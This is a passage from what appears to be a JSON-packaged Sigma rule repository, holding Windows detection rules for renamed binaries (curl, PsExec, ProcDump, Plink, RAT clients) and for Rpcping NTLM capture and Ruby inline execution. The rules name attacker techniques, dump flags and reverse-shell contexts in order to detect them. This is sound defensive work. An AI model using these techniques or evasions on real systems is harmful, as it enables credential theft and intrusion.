' # Short version of '--name'\n              - '.dmp'\n    filter:\n        Image|endswith: '\\createdump.exe'\n    condition: 1 of selection_* and not filter\nfalsepositives:\n    - Command lines that use the same flags\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_curl.yml",
    "content": "title: Renamed CURL.EXE Execution\nid: 7530cd3d-7671-43e3-b209-976966f6ea48\nstatus: test\ndescription: Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields\nreferences:\n    - https://twitter.com/Kostastsale/status/1700965142828290260\nauthor: X__Junior (Nextron Systems)\ndate: 2023-09-11\nmodified: 2023-10-12\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'curl.exe'\n        - Description: 'The curl executable'\n    filter_main_img:\n        Image|contains: '\\curl'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml",
    "content": "title: Renamed ZOHO Dctask64 Execution\nid: 340a090b-c4e9-412e-bb36-b4b16fe96f9b\nstatus: test\ndescription: |\n    Detects a renamed \"dctask64.exe\" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\n    This binary can be abused for DLL injection, arbitrary command and process execution.\nreferences:\n    - https://twitter.com/gN3mes1s/status/1222088214581825540\n    - https://twitter.com/gN3mes1s/status/1222095963789111296\n    - https://twitter.com/gN3mes1s/status/1222095371175911424\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-01-28\nmodified: 2025-01-22\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1055.001\n    - attack.t1202\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Hashes|contains:\n            - 'IMPHASH=6834B1B94E49701D77CCB3C0895E1AFD'\n            - 'IMPHASH=1BB6F93B129F398C7C4A76BB97450BBA'\n            - 'IMPHASH=FAA2AC19875FADE461C8D89DCF2710A3'\n            - 'IMPHASH=F1039CED4B91572AB7847D26032E6BBF'\n    filter_main_legit_name:\n        Image|endswith: '\\dctask64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_ftp.yml",
    "content": "title: Renamed FTP.EXE Execution\nid: 277a4393-446c-449a-b0ed-7fdc7795244c\nstatus: test\ndescription: Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ftp/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2023-02-03\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_original:\n        OriginalFileName: 'ftp.exe'\n    filter_img:\n        Image|endswith: '\\ftp.exe'\n    condition: selection_original and not filter_img\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml",
    "content": "title: Renamed Gpg.EXE Execution\nid: ec0722a3-eb5c-4a56-8ab2-bf6f20708592\nstatus: test\ndescription: Detects the execution of a renamed \"gpg.exe\". Often used by ransomware and loaders to decrypt/encrypt data.\nreferences:\n    - https://securelist.com/locked-out/68960/\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-08-09\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'gpg.exe'\n    filter_main_img:\n        Image|endswith:\n            - '\\gpg.exe'\n            - '\\gpg2.exe'\n    condition: selection and not 1 of filter_main_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_jusched.yml",
    "content": "title: Renamed Jusched.EXE Execution\nid: edd8a48c-1b9f-4ba1-83aa-490338cd1ccb\nstatus: test\ndescription: Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group\nreferences:\n    - https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf\nauthor: Markus Neis, Swisscom\ndate: 2019-06-04\nmodified: 2023-02-03\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description:\n            - Java Update Scheduler\n            - Java(TM) Update Scheduler\n    filter:\n        Image|endswith: '\\jusched.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml",
    "content": "title: Renamed Mavinject.EXE Execution\nid: e6474a1b-5390-49cd-ab41-8d88655f7394\nstatus: test\ndescription: Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md\n    - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e\n    - https://twitter.com/gN3mes1s/status/941315826107510784\n    - https://reaqta.com/2017/12/mavinject-microsoft-injector/\n    - https://twitter.com/Hexacorn/status/776122138063409152  # Deleted tweet\n    - https://github.com/SigmaHQ/sigma/issues/3742\n    - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection\nauthor: frack113, Florian Roth\ndate: 2022-12-05\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.001\n    - attack.t1218.013\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - 'mavinject32.exe'\n            - 'mavinject64.exe'\n    filter:\n        Image|endswith:\n            - '\\mavinject32.exe'\n            - '\\mavinject64.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_megasync.yml",
    "content": "title: Renamed MegaSync Execution\nid: 643bdcac-8b82-49f4-9fd9-25a90b929f3b\nstatus: test\ndescription: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.\nreferences:\n    - https://redcanary.com/blog/rclone-mega-extortion/\nauthor: Sittikorn S\ndate: 2021-06-22\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        OriginalFileName: 'megasync.exe'\n    filter:\n        Image|endswith: '\\megasync.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Software that illegally integrates MegaSync in a renamed form\n    - Administrators that have renamed MegaSync\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_msdt.yml",
    "content": "title: Renamed Msdt.EXE Execution\nid: bd1c6866-65fc-44b2-be51-5588fcff82b9\nstatus: test\ndescription: Detects the execution of a renamed \"Msdt.exe\" binary\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/\nauthor: pH-T (Nextron Systems)\ndate: 2022-06-03\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'msdt.exe'\n    filter:\n        Image|endswith: '\\msdt.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_msteams.yml",
    "content": "title: Renamed Microsoft Teams Execution\nid: 88f46b67-14d4-4f45-ac2c-d66984f22191\nstatus: test\ndescription: Detects the execution of a renamed Microsoft Teams binary.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-12\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - 'msteams.exe'\n            - 'teams.exe'\n    filter_main_legit_names:\n        Image|endswith:\n            - '\\msteams.exe'\n            - '\\teams.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml",
    "content": "title: Renamed NetSupport RAT Execution\nid: 0afbd410-de03-4078-8491-f132303cb67d\nstatus: test\ndescription: Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-19\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Product|contains: 'NetSupport Remote Control'\n        - OriginalFileName|contains: 'client32.exe'\n        - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E\n    filter:\n        Image|endswith: '\\client32.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_nircmd.yml",
    "content": "title: Renamed NirCmd.EXE Execution\nid: 264982dc-dbad-4dce-b707-1e0d3e0f73d9\nstatus: test\ndescription: Detects the execution of a renamed \"NirCmd.exe\" binary based on the PE metadata fields.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\n    - https://www.nirsoft.net/utils/nircmd.html\nauthor: X__Junior (Nextron Systems)\ndate: 2024-03-11\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'NirCmd.exe'\n    filter_main_img:\n        Image|endswith:\n            - '\\nircmd.exe'\n            - '\\nircmdc.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml",
    "content": "title: Renamed Office Binary Execution\nid: 0b0cd537-fc77-4e6e-a973-e53495c1083d\nstatus: test\ndescription: Detects the execution of a renamed office binary\nreferences:\n    - https://infosec.exchange/@sbousseaden/109542254124022664\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-20\nmodified: 2025-12-09\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName:\n              - 'Excel.exe'\n              - 'MSACCESS.EXE'\n              - 'MSPUB.EXE'\n              - 'OneNote.exe'\n              - 'OneNoteM.exe'\n              - 'OUTLOOK.EXE'\n              - 'POWERPNT.EXE'\n              - 'WinWord.exe'\n              - 'Olk.exe'\n        - Description:\n              - 'Microsoft Access'\n              - 'Microsoft Excel'\n              - 'Microsoft OneNote'\n              - 'Microsoft Outlook'\n              - 'Microsoft PowerPoint'\n              - 'Microsoft Publisher'\n              - 'Microsoft Word'\n              - 'Sent to OneNote Tool'\n    filter_main_legit_names:\n        Image|endswith:\n            - '\\EXCEL.exe'\n            - '\\excelcnv.exe'\n            - '\\MSACCESS.exe'\n            - '\\MSPUB.EXE'\n            - '\\ONENOTE.EXE'\n            - '\\ONENOTEM.EXE'\n            - '\\OUTLOOK.EXE'\n            - '\\POWERPNT.EXE'\n            - '\\WINWORD.exe'\n            - '\\OLK.EXE'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_paexec.yml",
    "content": "title: Renamed PAExec Execution\nid: c4e49831-1496-40cf-8ce1-b53f942b02f9\nrelated:\n    - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b\n      type: obsolete\nstatus: test\ndescription: Detects execution of renamed version of PAExec. Often used by attackers\nreferences:\n    - https://www.poweradmin.com/paexec/\n    - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf\nauthor: Florian Roth (Nextron Systems), Jason Lynch\ndate: 2021-05-22\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'PAExec Application'\n        - OriginalFileName: 'PAExec.exe'\n        - Product|contains: 'PAExec'\n        - Hashes|contains:\n              - IMPHASH=11D40A7B7876288F919AB819CC2D9802\n              - IMPHASH=6444f8a34e99b8f7d9647de66aabe516\n              - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f\n              - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c\n    filter_main_known_location:\n        - Image|endswith: '\\paexec.exe'\n        - Image|startswith: 'C:\\Windows\\PAExec-'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Weird admins that rename their tools\n    - Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing\n    - When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_pingcastle.yml",
    "content": "title: Renamed PingCastle Binary Execution\nid: 2433a154-bb3d-42e4-86c3-a26bdac91c45\nstatus: test\ndescription: Detects the execution of a renamed \"PingCastle\" binary based on the PE metadata fields.\nreferences:\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://www.pingcastle.com/documentation/scanner/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2024-01-11\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName:\n              - 'PingCastleReporting.exe'\n              - 'PingCastleCloud.exe'\n              - 'PingCastle.exe'\n        - CommandLine|contains:\n              - '--scanner aclcheck'\n              - '--scanner antivirus'\n              - '--scanner computerversion'\n              - '--scanner foreignusers'\n              - '--scanner laps_bitlocker'\n              - '--scanner localadmin'\n              - '--scanner nullsession'\n              - '--scanner nullsession-trust'\n              - '--scanner oxidbindings'\n              - '--scanner remote'\n              - '--scanner share'\n              - '--scanner smb'\n              - '--scanner smb3querynetwork'\n              - '--scanner spooler'\n              - '--scanner startup'\n              - '--scanner zerologon'\n        - CommandLine|contains: '--no-enum-limit'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--level Full'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--server '\n    filter_main_img:\n        Image|endswith:\n            - '\\PingCastleReporting.exe'\n            - '\\PingCastleCloud.exe'\n            - '\\PingCastle.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_plink.yml",
    "content": "title: Renamed Plink Execution\nid: 1c12727d-02bf-45ff-a9f3-d49806a3cf43\nstatus: test\ndescription: Detects the execution of a renamed version of the Plink binary\nreferences:\n    - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/\n    - https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-06\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'Plink'\n        - CommandLine|contains|all:\n              - ' -l forward'\n              - ' -P '\n              - ' -R '\n    filter:\n        Image|endswith: '\\plink.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml",
    "content": "title: Visual Studio NodejsTools PressAnyKey Renamed Execution\nid: 65c3ca2c-525f-4ced-968e-246a713d164f\nrelated:\n    - id: a20391f8-76fb-437b-abc0-dba2df1952c6\n      type: similar\nstatus: test\ndescription: Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries\nreferences:\n    - https://twitter.com/mrd0x/status/1463526834918854661\n    - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2023-04-11\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'Microsoft.NodejsTools.PressAnyKey.exe'\n    filter_main_legit_name:\n        Image|endswith: '\\Microsoft.NodejsTools.PressAnyKey.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml",
    "content": "title: Potential Renamed Rundll32 Execution\nid: 2569ed8c-1147-498a-9b8c-2ad3656b10ed\nrelated:\n    - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\n      type: derived\nstatus: test\ndescription: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection\nreferences:\n    - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20\n    - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-22\nmodified: 2023-02-03\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'DllRegisterServer'\n    filter:\n        Image|endswith: '\\rundll32.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_rurat.yml",
    "content": "title: Renamed Remote Utilities RAT (RURAT) Execution\nid: 9ef27c24-4903-4192-881a-3adde7ff92a5\nstatus: test\ndescription: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-19\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.collection\n    - attack.command-and-control\n    - attack.discovery\n    - attack.s0592\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Product: 'Remote Utilities'\n    filter:\n        Image|endswith:\n            - '\\rutserv.exe'\n            - '\\rfusclient.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_schtasks_execution.yml",
    "content": "title: Renamed Schtasks Execution\nid: f91e51c9-f344-4b32-969b-0b6f6b8537d4\nstatus: experimental\ndescription: |\n    Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.\n    One of the very common persistence techniques is schedule malicious tasks using schtasks.exe.\n    Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.\nreferences:\n    - https://x.com/JangPr0/status/1932034543026065833\n    - https://ss64.com/nt/schtasks.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1036.003\n    - attack.t1053.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd_operation:\n        CommandLine|contains|windash:\n            - ' /create '\n            - ' /delete '\n            - ' /query '\n            - ' /change '\n            - ' /run '\n            - ' /end '\n    selection_cmd_flags:\n        CommandLine|contains|windash:\n            - ' /tn '\n            - ' /tr '\n            - ' /sc '\n            - ' /st '\n            - ' /ru '\n            - ' /fo '\n    selection_pe:\n        OriginalFileName: 'schtasks.exe'\n    filter_main_cmd:\n        CommandLine|contains: 'schtasks'\n    filter_main_img:\n        Image|endswith: '\\schtasks.exe'\n    condition: (all of selection_cmd_* and not filter_main_cmd) or (selection_pe and not filter_main_img)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml",
    "content": "title: Renamed SysInternals DebugView Execution\nid: cd764533-2e07-40d6-a718-cfeec7f2da7f\nstatus: test\ndescription: Detects suspicious renamed SysInternals DebugView execution\nreferences:\n    - https://www.epicturla.com/blog/sysinturla\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-28\nmodified: 2023-02-14\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Product: 'Sysinternals DebugView'\n    filter:\n        OriginalFileName: 'Dbgview.exe'\n        Image|endswith: '\\Dbgview.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml",
    "content": "title: Renamed ProcDump Execution\nid: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67\nrelated:\n    - id: 03795938-1387-481b-9f4c-3f6241e604fe\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the execution of a renamed ProcDump executable.\n    This often done by attackers or malware in order to evade defensive mechanisms.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-11-18\nmodified: 2024-06-25\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_ofn:\n        OriginalFileName: 'procdump'\n    selection_cli_dump_flag:\n        CommandLine|contains|windash:\n            - ' -ma ' # Full Dump\n            - ' -mp ' # Mini Plus\n    selection_cli_eula_flag:\n        # Note: Even though the \"accepteula\" flag isn't required. We add it to avoid collision with similar utilities.\n        CommandLine|contains|windash: ' /accepteula'\n    filter_main_known_names:\n        Image|endswith:\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n    condition: (selection_ofn or all of selection_cli_*) and not 1 of filter_main_*\nfalsepositives:\n    - Procdump illegally bundled with legitimate software.\n    - Administrators who rename binaries (should be investigated).\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml",
    "content": "title: Renamed PsExec Service Execution\nid: 51ae86a2-e2e1-4097-ad85-c46cb6851de4\nstatus: test\ndescription: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.youtube.com/watch?v=ro2QuZTIMBM\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-21\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'psexesvc.exe'\n    filter:\n        Image: 'C:\\Windows\\PSEXESVC.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate administrative tasks\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml",
    "content": "title: Renamed Sysinternals Sdelete Execution\nid: c1d867fe-8d95-4487-aab4-e53f2d339f90\nstatus: test\ndescription: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-06\nmodified: 2023-02-03\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'sdelete.exe'\n    filter:\n        Image|endswith:\n            - '\\sdelete.exe'\n            - '\\sdelete64.exe'\n    condition: selection and not filter\nfalsepositives:\n    - System administrator usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml",
    "content": "title: Renamed Vmnat.exe Execution\nid: 7b4f794b-590a-4ad4-ba18-7964a2832205\nstatus: test\ndescription: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading\nreferences:\n    - https://twitter.com/malmoeb/status/1525901219247845376\nauthor: elhoim\ndate: 2022-09-09\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'vmnat.exe'\n    filter_rename:\n        Image|endswith: 'vmnat.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_whoami.yml",
    "content": "title: Renamed Whoami Execution\nid: f1086bf7-a0c4-4a37-9102-01e573caf4a0\nstatus: test\ndescription: Detects the execution of whoami that has been renamed to a different name to avoid detection\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-12\nmodified: 2022-10-09\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'whoami.exe'\n    filter:\n        Image|endswith: '\\whoami.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml",
    "content": "title: Capture Credentials with Rpcping.exe\nid: 93671f99-04eb-4ab4-a161-70d446a84003\nstatus: test\ndescription: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Rpcping/\n    - https://twitter.com/vysecurity/status/974806438316072960\n    - https://twitter.com/vysecurity/status/873181705024266241\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-09\nmodified: 2025-10-31\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main_img:\n        - Image|endswith: '\\RpcPing.exe'\n        - OriginalFileName: '\\RpcPing.exe'\n    selection_main_flag:\n        CommandLine|contains|windash: '-s'\n    selection_cli_ntlm:\n        CommandLine|contains|windash: '-u'\n        CommandLine|contains: 'NTLM'\n    selection_cli_ncacn:\n        CommandLine|contains|windash: '-t'\n        CommandLine|contains: 'ncacn_np'\n    condition: all of selection_main_* and 1 of selection_cli_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml",
    "content": "title: Ruby Inline Command Execution\nid: 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8\nstatus: test\ndescription: Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ruby.exe'\n        - OriginalFileName: 'ruby.exe'\n    selection_cli:\n        CommandLine|contains: ' -e'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml",
